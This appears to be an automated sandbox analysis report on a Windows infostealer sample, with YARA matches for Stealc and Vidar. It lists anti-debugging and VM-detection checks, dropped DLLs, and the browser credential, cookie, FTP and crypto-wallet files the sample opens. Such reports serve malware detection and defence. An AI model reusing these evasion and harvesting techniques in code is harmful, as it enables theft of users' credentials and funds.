Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7D2 second address: C4B7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7DB second address: C4B7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7E5 second address: C4B7ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7ED second address: C4B7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7F5 second address: C4B7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D418 second address: C4D421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D421 second address: C4D425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D425 second address: C4D429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3CD second address: B2D3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3D1 second address: B2D3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3DA second address: B2D3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FCFA second address: C4FCFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FEDD second address: C4FEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FEE8 second address: C4FEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFA9 second address: C4FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB8FCD64876h 0x0000000a popad 0x0000000b jbe 00007FB8FCD64878h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FB8FCD6487Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f jnl 00007FB8FCD64878h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB8FCD64883h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFEB second address: C4FFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C517E5 second address: C517E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C537CB second address: C537CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52902DC second address: 5290353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 00649B47h 0x00000008 pushfd 0x00000009 jmp 00007FB8FCD6487Ch 0x0000000e add cx, 59F8h 0x00000013 jmp 00007FB8FCD6487Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov cl, dl 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FB8FCD6487Dh 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov eax, 42B5F0B3h 0x0000002e jmp 00007FB8FCD64888h 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB8FCD64887h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73182 second address: B7318C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7318C second address: B73193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73323 second address: B73327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A73 second address: 5290A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A79 second address: 5290A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A7D second address: 5290AB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FB8FCD64880h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB8FCD64887h 0x00000017 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe

Special instruction interceptor: First address: 9C1943 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00774910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0076E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0076BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_007616D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00773EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00773EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_007738B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00774570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00774570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0076ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0076DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00761160 GetSystemInfo,ExitProcess,

0_2_00761160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EGDGIEGH.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: EGDGIEGH.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: EGDGIEGH.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: EGDGIEGH.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: EGDGIEGH.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.1638110314.0000000001284000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1638110314.00000000012C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: EGDGIEGH.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: EGDGIEGH.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: EGDGIEGH.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: EGDGIEGH.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: EGDGIEGH.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: EGDGIEGH.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: EGDGIEGH.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: EGDGIEGH.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: EGDGIEGH.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EGDGIEGH.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: EGDGIEGH.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: EGDGIEGH.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

0_2_6CBF5FF0

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007645C0 VirtualProtect ?,00000004,00000100,00000000

0_2_007645C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00779860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779750 mov eax, dword ptr fs:[00000030h]

0_2_00779750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00777850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CBCB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CBCB1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00779600

Source: file.exe, file.exe, 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: :Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBCB341 cpuid

0_2_6CBCB341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00777B90

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00776920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00776920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00777850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00777A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00777A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Jaxx Desktop
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: multidoge.wallet
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.1638110314.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.l

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
